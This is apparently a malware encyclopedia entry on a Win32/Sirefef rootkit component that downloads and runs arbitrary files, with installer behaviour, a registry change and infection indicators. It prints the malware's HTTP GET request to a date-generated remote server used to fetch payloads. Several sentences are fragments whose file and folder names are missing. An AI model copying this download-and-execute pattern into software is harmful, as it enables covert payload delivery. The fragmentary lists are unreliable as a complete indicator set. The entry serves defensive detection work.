is a component of the Win32/Sirefer rootkit. It downloads and executes an arbitrary file. Win32/Sirefef is a multi-component malware that moderates an affected user's Internet experience by modifying search results.
may be created by Win32/Sirefef rootkit installers, such as Trojan:Win32/Sirefef.J and Backdoor:Win32/Smadow.
The following folders, which are marked as "hidden", may also be created bythe rootkit installers alongside Trojan:Win32/Sirefef.S:
may be present as the file "resident.dll" in the first folder created above. However, if a user attempts to access these folders, the rootkit may terminate the accessing process.
The rootkit installers may also change the registry value "Type" to "1" for the following Windows service subkey:
Downloads arbitrary files
downloads and executes arbitrary files from a remote server. It does this by running the following HTTP GET request:
GET /p/tasks.php?w<ID>&n=0 HTTP/1.0
HOST: <server name>.cn
where <ID> is an identifier for the affected computer and <server name> is a remote server whose name is calculated based on the current calendar date.
Analysis by Sergey Chernyshev
The following system changes may indicate the presence of this malware:
- The following registry change:
In subkey: HKLM\SYSTEM\CurrentControlSet\services\mrxsmb
Modified value: "Type"